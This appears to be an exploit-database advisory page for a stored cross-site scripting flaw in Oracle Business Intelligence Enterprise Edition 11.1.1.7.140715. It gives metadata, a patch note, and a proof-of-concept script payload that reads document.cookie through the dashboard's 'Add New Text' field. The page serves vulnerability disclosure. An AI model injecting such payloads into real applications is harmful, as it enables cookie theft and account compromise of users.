header-logo
Suggest Exploit
vendor:
Business Intelligence Enterprise Edition
by:
omurugur
8.8
CVSS
HIGH
Stored XSS
79
CWE
Product Name: Business Intelligence Enterprise Edition
Affected Version From: 11.1.1.7.140715
Affected Version To: 11.1.1.7.140715
Patch Exists: Yes
Related CWE: N/A
CPE: a:oracle:business_intelligence_enterprise_edition
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2021

Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 – Stored XSS

A stored XSS vulnerability exists in Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715. An attacker can inject malicious JavaScript code into the Dashboard - Add New Text area, which will be executed when the page is loaded by a victim.

Mitigation:

Oracle has released a patch to address this vulnerability. Users should update to the latest version of Oracle Business Intelligence Enterprise Edition.
Source

Exploit-DB raw data:

# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
# Exploit Author: omurugur
# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
# Version: 11.1.1.7.140715
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

Stored  XSS:

“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}

Vulnerable area = Dashboard - Add New Text

Navigation

Suggest Exploit

Services By CQR